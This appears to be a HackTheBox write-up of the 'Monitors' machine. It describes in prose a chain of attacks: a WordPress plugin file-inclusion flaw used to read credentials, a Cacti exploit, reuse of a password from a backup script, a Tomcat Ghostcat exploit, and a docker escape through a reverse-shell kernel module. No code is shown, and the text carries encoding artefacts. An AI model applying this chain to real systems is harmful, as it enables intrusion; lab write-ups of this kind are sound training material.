šš¦¶Enumeration/Foothold
Monitors is an Hard box from HTB and created by TheCyberGeek. This box features a WordPress plugin exploit via wp-with-spritz allowing for LFI/RFI and an internal docker with Apache Tomcat running. I begin each box by running a RustScan. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. RunningĀ RustScanĀ withĀ NMAP
Ā filters shows a website available onĀ Port 80
. The website states ‘Sorry, direct IP access is not allowed’ but provides an admin contact detail.

[email protected] email address.
I edit my host file and add inĀ monitors.htb
.
Navigating over to the domain I see a WordPress website. Reviewing the page I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out of date WordPress.
Well the scan is running I notice thatĀ wp-with-spritz
Ā has been detected and its last update was 2015.

wp-with-spritz
coming up as 2015 being the last update.
A short search later shows me an entry fromĀ ExploitDB – 44544Ā which shows an LFI/RFI available for the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.
Next I used the LFI (Local File Inclusion) exploit to pull theĀ WP-ConfigĀ file. WP-Config file stores the database credentials for a WordPress installation. I viewed it in source as it tends to look cleaner then the static viewing.

wp-config.cfg
file running in source.
I try the credentials to login to the WordPress admin but it doesn’t work. I check around a few locations for the next point of escalation. I review NMAP
Ā and realize the machine is runningĀ Apache/2.4.29
. I navigate to theĀ 000-default.confĀ to see if the page we saw earlier can give us any additional information or if any other hosts exists.

Running Apache/2.4.29

An additional VHOST is available.
I add the new host in my hosts file and navigate over to the new sub-domain. I try the credentials found earlier in theĀ WP-Config
Ā file and log in. It took me a second as I needed to useĀ adminĀ for the username and not wpadmin.
I navigate around the console looking for a file upload or script option. Next I check the version which is located at the top right of the page.

Cacti 1.2.12
šEscalation
This leads me toĀ ExploitDB – 49810Ā which I pull to my Attack VM and run. I fill in the required variables and submit the request, giving my a low privilege shell.
ā Attack Machine (Tab 1)

ExploitDB – 49810 running successfully.
ā Attack Machine (Tab 2)
After getting onto the machine and upgrading my shell I tried to useĀ curl
Ā orĀ WGET
Ā to pull files to the box and was unable to do so as they were both not installed. UsingĀ nc
I pulled Linenum to the box.
šÆVictim Machine
ā Attack Machine
Going through the endless string of results I noticeĀ cacti-backup.service
. I also notice that the userĀ marcus who I was trying to escalate too had aĀ .backup
Ā directory.

.backup
directory in Marcus’ home directory and

cacti-backup.service
running on the machine.
Reviewing theĀ cacti-backup.service
Ā I can see that theĀ .backup
Ā folder m entioned earlier has a shell script inside the directory. Trying to view it gives me his credentials. IĀ su
Ā to his account, grab the flag and tryĀ ssh
.

cacti-backup.service
showing a backup script running in .backup

and the password for Marcus in backup.sh
I login withĀ SSH
Ā and read the note –
This must be a clue to how I progress. I check services running looking for a docker installation. I noticeĀ Port 8443
Ā open which wasn’t visible on the original scan. I useĀ SSH
Ā to forward the port to my local host.

Port 8443
open on the local host.

Apache Tomcat/9.0.31
running on the local host.
Viewing the page does not give me the exploit I was hoping for but I do noticeĀ Apache Tomcat/9.0.31
running which I know is constantly being exploited. A short Google late shows me that a Metasploit module is available.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit
The first I ran the exploit it errored and told me to useĀ ForceExploit
Ā to override. Doing this allowed me to get a meterpeter shell.

ForceExploit
command used due to local host pivot
After running the exploit I could see I was root of the docker environment. I knew next steps were to escape and escalate. I found this article on hacktricks, hacktricks – Docker Breakout.
Inside the previous output you can see that theĀ SYS_MODULEĀ capability is enabled. Going through the first link lead me to a second article focused full onĀ CAP_SYS_MODULE
Ā hacktricks -CAP_SYS_MODDULE. Truthfully this part can be confusing so just follow the article as best you can.
šÆVictim Machine
ā Attack Machine
Use the copy command (on the website) to copyĀ reverse-shell.cĀ andĀ Makefile. After theĀ reverse-shell.cĀ onĀ Line 8
Ā and put in your own IP/Port. Make sure when copying theĀ MakefileĀ you tab the blank char before each word. When done launch a web server and pull both files to the machine.
š Makefile
š reverse-shell.c
After we runĀ reverse-shell.ko
Ā on the docker VM our reverse shell pops and we are root.

Root on Monitors from HTB.